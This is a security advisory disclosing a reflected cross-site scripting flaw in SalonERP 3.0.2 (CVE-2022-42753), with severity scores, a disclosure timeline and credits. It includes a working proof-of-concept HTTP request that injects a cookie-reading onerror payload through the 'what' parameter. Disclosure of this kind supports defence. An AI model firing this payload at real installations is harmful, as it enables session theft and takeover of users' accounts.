SalonERP 3.0.2 - XSS to Account Takeover
Summary
| Name | SalonERP 3.0.2 - XSS to Account Takeover |
| Code name | |
| Product | SalonERP |
| Affected versions | Version 3.0.2 |
| State | Public |
| Release date | 2022-10-27 |
Vulnerability
| Kind | Reflected cross-site scripting (XSS) |
| Rule | |
| Remote | Yes |
| CVSSv3.1 Vector | CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H |
| CVSSv3.1 Base Score | 8.8 |
| Exploit available | Yes |
| CVE ID(s) |
Description
SalonERP version 3.0.2 allows an external attacker to steal the cookie of arbitrary users. This is possible because the application does not correctly validate the page parameter against XSS attacks.
Vulnerability
The XSS present in SalonERP 3.0.2, allows an unauthenticated remote attacker to perform an Account Takeover. To trigger this vulnerability, we will need to send the following malicious link to an victim in order to hack their account:
POST /try/backend.php HTTP/2 Host: salonerp.sourceforge.io Cookie: salonerp-id=EnznqgZ8cAX2N7stbSLl; PHPSESSID=2f8c90c0e918726eed019427af65f438 User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:91.0) Gecko/20100101 Firefox/91.0 Origin: https://hacker.com Content-Type: application/x-www-form-urlencoded Content-Length: 61 what=settings<img+src=1+onerror="(alert)(document.cookie)" />
Exploitation
In this attack we will obtain the victim user account, through a malicious link.
Our security policy
We have reserved the CVE-2022-42753 to refer to these issues from now on.
System Information
-
Version: SalonERP 3.0.2
-
Operating System: GNU/Linux
Mitigation
There is currently no patch available for this vulnerability.
Credits
The vulnerability was discovered by Carlos Bello from Fluid Attacks' Offensive Team.
References
Vendor page https://salonerp.sourceforge.io/
Timeline
2022-10-13
Vulnerability discovered.
2022-10-13
Vendor contacted.
2022-10-13
Vendor replied acknowledging the report.
2022-10-27
Public Disclosure.
